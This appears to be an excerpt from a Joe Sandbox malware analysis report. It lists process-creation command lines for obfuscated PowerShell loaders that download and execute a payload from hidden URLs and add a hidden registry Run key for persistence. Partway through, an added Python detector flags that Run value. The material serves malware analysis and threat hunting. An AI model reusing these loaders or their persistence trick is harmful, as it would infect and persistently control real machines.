Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. 
usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Cla
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. 
usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Cla
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe | Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
Source: C:\Windows\SysWOW64\clip.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$antigyrous='s';$antigyrous+='ubs';$antigyrous+='tri';$disseizure = 1;$antigyrous+='ng';function sortkridtstegningens($udlossende){$makah=$udlossende.length-$disseizure;for($vaesentligheden206=5;$vaesentligheden206 -lt $makah;$vaesentligheden206+=6){$vrdiomraades+=$udlossende.$antigyrous.invoke( $vaesentligheden206, $disseizure);}$vrdiomraades;}function caprellidae($kondenseret){ & ($fligene) ($kondenseret);}$festdragtens=sortkridtstegningens ' s.ovmfo,klobeathzbelavi overlfaciolvictramictu/kphje5krlha.osteo0 prin sove( tiltwlnfreina.osnteg sdwatero,etatwvaskosregis trounswigstinges retsa1intel0 aspe. anal0 c oc;p.aya disshwdolicila gbnf,ktu6trska4 g.nz;an ui omkamxh tto6forha4 fine;hvidg ring rflaskvbakka: uden1pyroc2 unmo1anili.stil.0 t,ks) dy.t aendrg guldewavescic,erkadonio el.f/ scri2kaily0signa1beb,u0apnea0ne,tu1headw0tre s1freml treadfrecoiijargorapnoeesnorkfwhiffoleysex bioe/aspar1fetic2pseu.1udstt. tope0snic, ';$lrredskjolernes=sortkridtstegningens ' scleuspn.msrepedeene gr mell-undreafluidgfors.eandennsupert brav ';$hypermnesia=sortkridtstegningens 'semiahslangtloosstlage.p pnhe:xwfin/dummk/polym1 c,pt9thges4elect.inval5repet9 eksa. mugg3ligro0 thom.bevge6gulli/m.nkeu sagrntr lacink,tobeanfmaarsaisandsclaiba.landgmbombedfingepforly ';$aktiveret=sortkridtstegningens 'freqe>fredn ';$fligene=sortkridtstegningens ' molyi forhetopsax pers ';$opvarmningsmssige='mongolisms';$haandvrksbagere = sortkridtstegningens 'medicefibe c escah smleodomin paste% unp.a demepchelipdecardsubfla unactsu.liaundon%,rmme\teksti selvnindigd droniudsvistyknipbraknoonestsrenteeskibsddeempnkog.iegennesdyingsth mu. 
a,svaempris rings emu, peng&skyfo&pusli steereaflvncth.nahskeleosideo alb.mtaftvt ';caprellidae (sortkridtstegningens 'sekst$lagergdecimlspectoasem beftera,usiolflam :worthrdoms,uknle ia solnpleathcivilosnedkbkaroletyndsngrasssconch= arve(bloodcraidemsydyedstrkk pik p/fjortcperco appre$dial,hkuardaa.olia lv,an.hyrod,igtov joshrobtaik fjersfi.msbst rtaconsugbe evegryderungdoemixyp)umb.l ');caprellidae (sortkridtstegningens 'opmun$spildgstilllscienospilob nkomavent lhksun:nondigresoryhellirgglero honosou,pucsvkk ocommep berei smudc ,ini=pyr o$sy,tahunpraypluc p,uracesynedrberigmae opneryt eangolsbothiiskefua domf.e.gotsbede.psjofels.ndiijo.rnthydro(prokl$ afleaamts.kblomsterodeiatonav torenonscr atsaefor ktcon e)oscil ');$hypermnesia=$gyroscopic[0];$charcia= (sortkridtstegningens ' most$mislig whirls,geeohaandb,olicaz.omelboard:m elfscard.kudarmir.ssof fugetimpreeunanntsinca1 b ll4noedv=v rbonundereprojiwsyste-pumpeobaro.bklassjhumaneforurcnoncrtel ct sangvs vriky diststh.wlt,ndstefilodmkvali.,odern exhae sk,btpleur.o,erpwun.enepaaklbinvercendomlamblyidrillegellynuvet,t');$charcia+=$ruinhobens[1];caprellidae ($charcia);caprellidae (sortkridtstegningens ' s,ri$ansa.starikkb.njoisk rpfrealitkartvevariet dove1puggi4nonve. ph lhsag,regenteac erudndlidest.n
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$antigyrous='s';$antigyrous+='ubs';$antigyrous+='tri';$disseizure = 1;$antigyrous+='ng';function sortkridtstegningens($udlossende){$makah=$udlossende.length-$disseizure;for($vaesentligheden206=5;$vaesentligheden206 -lt $makah;$vaesentligheden206+=6){$vrdiomraades+=$udlossende.$antigyrous.invoke( $vaesentligheden206, $disseizure);}$vrdiomraades;}function caprellidae($kondenseret){ & ($fligene) ($kondenseret);}$festdragtens=sortkridtstegningens ' s.ovmfo,klobeathzbelavi overlfaciolvictramictu/kphje5krlha.osteo0 prin sove( tiltwlnfreina.osnteg sdwatero,etatwvaskosregis trounswigstinges retsa1intel0 aspe. anal0 c oc;p.aya disshwdolicila gbnf,ktu6trska4 g.nz;an ui omkamxh tto6forha4 fine;hvidg ring rflaskvbakka: uden1pyroc2 unmo1anili.stil.0 t,ks) dy.t aendrg guldewavescic,erkadonio el.f/ scri2kaily0signa1beb,u0apnea0ne,tu1headw0tre s1freml treadfrecoiijargorapnoeesnorkfwhiffoleysex bioe/aspar1fetic2pseu.1udstt. tope0snic, ';$lrredskjolernes=sortkridtstegningens ' scleuspn.msrepedeene gr mell-undreafluidgfors.eandennsupert brav ';$hypermnesia=sortkridtstegningens 'semiahslangtloosstlage.p pnhe:xwfin/dummk/polym1 c,pt9thges4elect.inval5repet9 eksa. mugg3ligro0 thom.bevge6gulli/m.nkeu sagrntr lacink,tobeanfmaarsaisandsclaiba.landgmbombedfingepforly ';$aktiveret=sortkridtstegningens 'freqe>fredn ';$fligene=sortkridtstegningens ' molyi forhetopsax pers ';$opvarmningsmssige='mongolisms';$haandvrksbagere = sortkridtstegningens 'medicefibe c escah smleodomin paste% unp.a demepchelipdecardsubfla unactsu.liaundon%,rmme\teksti selvnindigd droniudsvistyknipbraknoonestsrenteeskibsddeempnkog.iegennesdyingsth mu. 
a,svaempris rings emu, peng&skyfo&pusli steereaflvncth.nahskeleosideo alb.mtaftvt ';caprellidae (sortkridtstegningens 'sekst$lagergdecimlspectoasem beftera,usiolflam :worthrdoms,uknle ia solnpleathcivilosnedkbkaroletyndsngrasssconch= arve(bloodcraidemsydyedstrkk pik p/fjortcperco appre$dial,hkuardaa.olia lv,an.hyrod,igtov joshrobtaik fjersfi.msbst rtaconsugbe evegryderungdoemixyp)umb.l ');caprellidae (sortkridtstegningens 'opmun$spildgstilllscienospilob nkomavent lhksun:nondigresoryhellirgglero honosou,pucsvkk ocommep berei smudc ,ini=pyr o$sy,tahunpraypluc p,uracesynedrberigmae opneryt eangolsbothiiskefua domf.e.gotsbede.psjofels.ndiijo.rnthydro(prokl$ afleaamts.kblomsterodeiatonav torenonscr atsaefor ktcon e)oscil ');$hypermnesia=$gyroscopic[0];$charcia= (sortkridtstegningens ' most$mislig whirls,geeohaandb,olicaz.omelboard:m elfscard.kudarmir.ssof fugetimpreeunanntsinca1 b ll4noedv=v rbonundereprojiwsyste-pumpeobaro.bklassjhumaneforurcnoncrtel ct sangvs vriky diststh.wlt,ndstefilodmkvali.,odern exhae sk,btpleur.o,erpwun.enepaaklbinvercendomlamblyidrillegellynuvet,t');$charcia+=$ruinhobens[1];caprellidae ($charcia);caprellidae (sortkridtstegningens ' s,ri$ansa.starikkb.njoisk rpfrealitkartvevariet dove1puggi4nonve. ph lhsag,
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "argumentlistens" /t reg_expand_sz /d "%semicomic% -w 1 $affektationernes=(get-itemproperty -path 'hkcu:\agenetic76\').tautologiske178;%semicomic% ($affektationernes)"
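The two REG ADD entries above (the wab.exe child cmd.exe and the reg.exe it spawns, shown once in original case and once lowercased) write a Run value that is worth hunting for on other hosts: it is REG_EXPAND_SZ so that the leading %Semicomic% is expanded at logon (presumably to the PowerShell binary, which the report does not show), it asks for a hidden window (-w 1 is -WindowStyle Hidden), it reads the real stage from a second HKCU key with Get-ItemProperty, and it hands that string back to the same launcher. The check below is an added example and not part of the Joe Sandbox report: the sample value is copied from the command line above, while the allowlist, the benign comparison value and all function names are constructed for the example.

```python
# Added example (not from the report): flag HKCU Run values that match the
# registry-stored PowerShell stager pattern established by the REG ADD above.
import re
import sys

# Hypothetical baseline: environment variables a Run value may legitimately
# start with on the fleet. Anything else in front of the launcher is suspect.
LAUNCHER_ALLOWLIST = {"%SystemRoot%", "%windir%", "%ProgramFiles%",
                      "%ProgramFiles(x86)%", "%LOCALAPPDATA%"}

RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"


def assess_run_value(name: str, data: str) -> list[str]:
    """Return the reasons a Run value looks like a registry-stored PowerShell stager."""
    reasons: list[str] = []
    # 1. Launcher hidden behind an environment variable that is not a known one.
    m = re.match(r"\s*(%[^%\s]+%)", data)
    if m and m.group(1) not in LAUNCHER_ALLOWLIST:
        reasons.append(f"{name}: launcher hidden behind env var {m.group(1)}")
    # 2. Hidden window: -w 1 / -WindowStyle Hidden.
    if re.search(r"(?i)-w(?:indowstyle)?\s+(?:1|hidden)\b", data):
        reasons.append(f"{name}: hidden window")
    # 3. Stage fetched from another registry key via Get-ItemProperty.
    reg = re.search(r"(?i)get-itemproperty\s+-path\s+'(HK\w+:[^']*)'\)?\.(\w+)", data)
    if reg:
        reasons.append(f"{name}: stage read from registry {reg.group(1)} value {reg.group(2)}")
    # 4. The launcher is invoked again with the fetched variable as its script.
    if re.search(r"%\w+%\s*\(\$\w+\)", data):
        reasons.append(f"{name}: launcher re-invoked with the fetched string as its script")
    return reasons


def scan_run_key() -> dict[str, list[str]]:
    """Windows only: enumerate HKCU Run and return the flagged values.
    On other platforms there is nothing to read, so an empty dict comes back."""
    if sys.platform != "win32":
        return {}
    import winreg
    findings: dict[str, list[str]] = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
        index = 0
        while True:
            try:
                name, data, _kind = winreg.EnumValue(key, index)
            except OSError:  # no more values under the key
                break
            index += 1
            if isinstance(data, str) and (reasons := assess_run_value(name, data)):
                findings[name] = reasons
    return findings


# Copied from the REG ADD command line in the report above.
SAMPLE_NAME = "Argumentlistens"
SAMPLE_DATA = (r"%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\')"
               r".Tautologiske178;%Semicomic% ($Affektationernes)")

# Constructed benign value for comparison; not taken from the report.
BENIGN_DATA = r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'

if __name__ == "__main__":
    for reason in assess_run_value(SAMPLE_NAME, SAMPLE_DATA):
        print(reason)
    print(assess_run_value("OneDrive", BENIGN_DATA))
    print(scan_run_key())
```

Rule 3 is the one that matters for triage: it names the key (HKCU:\Agenetic76\) and value (Tautologiske178) that hold the next stage, which is what to export before the host is rebuilt; rules 1, 2 and 4 are cheap corroboration and, on their own, would also fire on some legitimate launchers, so keep them as supporting evidence rather than as a blocking alert.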
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$radiosender='sub';$radiosender+='strin';$knnest = 1;$radiosender+='g';function beshout($solurenes){$strejftogters=$solurenes.length-$knnest;for($overskringers=5;$overskringers -lt $strejftogters;$overskringers+=6){$neodadaism+=$solurenes.$radiosender.invoke( $overskringers, $knnest);}$neodadaism;}function lovbundnes($yttria){ . ($afskalningernes) ($yttria);}$piggy=beshout 'mrtelm kr.dotcknozoversi .alil.angsli traa woma/hjemm5ustem.battl0byudv fr,g( ndewhaandiskranntankrdforgroadvokwatropspiske pne mnpandot.tuts bane1 dap0 copy.sei.m0 nyre;procu ,ropwpr,exifleyenmonta6dou l4 dri,;s bco torvexuafvr6kooke4rep.e;ensur afrakrtingsvecaud:.rtho1tele,2micro1,punk.dvelr0compl)duboi unameg .dskefreskcdesidkforumos.fte/rd,pr2kbenh0indre1topvi0vaag.0charl1batho0rever1aureg encodf bel idvrgtrbastiek,ydsfindlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.hulen0,ates ';$formaliaers=beshout 'fugtpuskiljs.ippeeslivorknobk-gldesanonirgcoxiee lag nidenttpo.ku ';$gem=beshout 'opadgh valgtdivertcountpfortssrigm.:be,po/vr.ss/neotermetheapyramm borti zikkrmanyrefunktx,awmi.foredr treso afpu/antirrtradeu.omatt.seudsindevcgimpmhast,re no.fblkk,rafyrstndokhmerecresr leg.zabraqjustuxmidvedminco ';$morsomhedernes78=beshout ' pli.>bemr, ';$afskalningernes=beshout 'cou,tibombaefor,lx,obbe ';$uniformerne='requisites';$generaliserede135 = beshout 'mn tresildecdynamhfremfo herr shri%udrk a f,nspsyc.pppasswdbadesakok etbro,eanedry%stand\skan,mbal.ie preft istaakrngecbidraaklororseashpbe hiaululalileossploto.fordotfoto osea akrepre rumfr&.ltfo&proce violieseer,cinterh tdfaot,lst pomatt flle ';lovbundnes (beshout 'manip$netstgduromlcountodeathbsalgsastor.lsuper:alloybb nbrlspe.la linif oketf pro,ehals,rsydvee kla.natlas=rangl(brokkcmal,kmacftsderrat polit/giantcdesm. 
usdy$b kaggper.eeuro.tn fleteczardrpretea vaerlbuff,i korpsfinurebre.srldervesloucdr.gnbebando1ordna3 i,el5fre,s) bowl ');lovbundnes (beshout 'kilde$ vaagghumoul trusocom,ebpagurakritelbynrt:torsomskibsa derasguimpscentiasenagcsuctirforhaeemmagd cade= amor$cardig avlseacidbmchr.s.dronnssmaltplevnel charichinctburme( goni$bowldm.angeos,mmer ississteroos,vermprofihfanemebeggaddrakme xemer.erienextraekonomss.per7 amle8verde)kaf,e ');$gem=$massacred[0];$benzyls= (beshout ' four$brn gg d ggl rokaocoarcbh.ndgasamlel.ilgo: reflg dispeamar n avereioretr opt,ihoos c mi daafkrflunderlporceyhyper= .estnsortle ratgwslhun-sinlio racebdaabsjhalssestandc lokbt .yra tilbas dolpyu.sprskvag ttri,ee resimbashe.ellarnchemie.yskuttriam.prevow,nisoeko orbdisedcchevel routi.rende orinnbalitt');$benzyls+=$blafferen[1];lovbundnes ($benzyls);lovbundnes (beshout '.esen$akulegstratepneumn paceebe olrjut.si carmcbe.tya jnanlembr lterraysjamb.fyrsvh ,evie nfela u lndh.ctoeanteprkon aslevne[tilst$ ,nsefbelliounderr ravem,reagako,ifloverditerkeafreshe unr r cra.samour]forch=tvely$ko edpcountiforstgabonng tordytroll ');$cla
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$radiosender='sub';$radiosender+='strin';$knnest = 1;$radiosender+='g';function beshout($solurenes){$strejftogters=$solurenes.length-$knnest;for($overskringers=5;$overskringers -lt $strejftogters;$overskringers+=6){$neodadaism+=$solurenes.$radiosender.invoke( $overskringers, $knnest);}$neodadaism;}function lovbundnes($yttria){ . ($afskalningernes) ($yttria);}$piggy=beshout 'mrtelm kr.dotcknozoversi .alil.angsli traa woma/hjemm5ustem.battl0byudv fr,g( ndewhaandiskranntankrdforgroadvokwatropspiske pne mnpandot.tuts bane1 dap0 copy.sei.m0 nyre;procu ,ropwpr,exifleyenmonta6dou l4 dri,;s bco torvexuafvr6kooke4rep.e;ensur afrakrtingsvecaud:.rtho1tele,2micro1,punk.dvelr0compl)duboi unameg .dskefreskcdesidkforumos.fte/rd,pr2kbenh0indre1topvi0vaag.0charl1batho0rever1aureg encodf bel idvrgtrbastiek,ydsfindlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.hulen0,ates ';$formaliaers=beshout 'fugtpuskiljs.ippeeslivorknobk-gldesanonirgcoxiee lag nidenttpo.ku ';$gem=beshout 'opadgh valgtdivertcountpfortssrigm.:be,po/vr.ss/neotermetheapyramm borti zikkrmanyrefunktx,awmi.foredr treso afpu/antirrtradeu.omatt.seudsindevcgimpmhast,re no.fblkk,rafyrstndokhmerecresr leg.zabraqjustuxmidvedminco ';$morsomhedernes78=beshout ' pli.>bemr, ';$afskalningernes=beshout 'cou,tibombaefor,lx,obbe ';$uniformerne='requisites';$generaliserede135 = beshout 'mn tresildecdynamhfremfo herr shri%udrk a f,nspsyc.pppasswdbadesakok etbro,eanedry%stand\skan,mbal.ie preft istaakrngecbidraaklororseashpbe hiaululalileossploto.fordotfoto osea akrepre rumfr&.ltfo&proce violieseer,cinterh tdfaot,lst pomatt flle ';lovbundnes (beshout 'manip$netstgduromlcountodeathbsalgsastor.lsuper:alloybb nbrlspe.la linif oketf pro,ehals,rsydvee kla.natlas=rangl(brokkcmal,kmacftsderrat polit/giantcdesm. 
usdy$b kaggper.eeuro.tn fleteczardrpretea vaerlbuff,i korpsfinurebre.srldervesloucdr.gnbebando1ordna3 i,el5fre,s) bowl ');lovbundnes (beshout 'kilde$ vaagghumoul trusocom,ebpagurakritelbynrt:torsomskibsa derasguimpscentiasenagcsuctirforhaeemmagd cade= amor$cardig avlseacidbmchr.s.dronnssmaltplevnel charichinctburme( goni$bowldm.angeos,mmer ississteroos,vermprofihfanemebeggaddrakme xemer.erienextraekonomss.per7 amle8verde)kaf,e ');$gem=$massacred[0];$benzyls= (beshout ' four$brn gg d ggl rokaocoarcbh.ndgasamlel.ilgo: reflg dispeamar n avereioretr opt,ihoos c mi daafkrflunderlporceyhyper= .estnsortle ratgwslhun-sinlio racebdaabsjhalssestandc lokbt .yra tilbas dolpyu.sprskvag ttri,ee resimbashe.ellarnchemie.yskuttriam.prevow,nisoeko orbdisedcchevel routi.rende orinnbalitt');$benzyls+=$blafferen[1];lovbundnes ($benzyls);lovbundnes (beshout '.esen$akulegstratepneumn paceebe olrjut.si carmcbe.tya jnanlembr lterraysjamb.fyrsvh ,evie nfela u lndh.ctoeanteprkon aslevne[tilst$ ,nsefbelliounderr ravem,reagako,ifloverditerkeafreshe unr r cra.samour]forch=tvely$ko edpcountiforstgabonng tordytroll ');$cla
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$antigyrous='s';$antigyrous+='ubs';$antigyrous+='tri';$disseizure = 1;$antigyrous+='ng';function sortkridtstegningens($udlossende){$makah=$udlossende.length-$disseizure;for($vaesentligheden206=5;$vaesentligheden206 -lt $makah;$vaesentligheden206+=6){$vrdiomraades+=$udlossende.$antigyrous.invoke( $vaesentligheden206, $disseizure);}$vrdiomraades;}function caprellidae($kondenseret){ & ($fligene) ($kondenseret);}$festdragtens=sortkridtstegningens ' s.ovmfo,klobeathzbelavi overlfaciolvictramictu/kphje5krlha.osteo0 prin sove( tiltwlnfreina.osnteg sdwatero,etatwvaskosregis trounswigstinges retsa1intel0 aspe. anal0 c oc;p.aya disshwdolicila gbnf,ktu6trska4 g.nz;an ui omkamxh tto6forha4 fine;hvidg ring rflaskvbakka: uden1pyroc2 unmo1anili.stil.0 t,ks) dy.t aendrg guldewavescic,erkadonio el.f/ scri2kaily0signa1beb,u0apnea0ne,tu1headw0tre s1freml treadfrecoiijargorapnoeesnorkfwhiffoleysex bioe/aspar1fetic2pseu.1udstt. tope0snic, ';$lrredskjolernes=sortkridtstegningens ' scleuspn.msrepedeene gr mell-undreafluidgfors.eandennsupert brav ';$hypermnesia=sortkridtstegningens 'semiahslangtloosstlage.p pnhe:xwfin/dummk/polym1 c,pt9thges4elect.inval5repet9 eksa. mugg3ligro0 thom.bevge6gulli/m.nkeu sagrntr lacink,tobeanfmaarsaisandsclaiba.landgmbombedfingepforly ';$aktiveret=sortkridtstegningens 'freqe>fredn ';$fligene=sortkridtstegningens ' molyi forhetopsax pers ';$opvarmningsmssige='mongolisms';$haandvrksbagere = sortkridtstegningens 'medicefibe c escah smleodomin paste% unp.a demepchelipdecardsubfla unactsu.liaundon%,rmme\teksti selvnindigd droniudsvistyknipbraknoonestsrenteeskibsddeempnkog.iegennesdyingsth mu. 
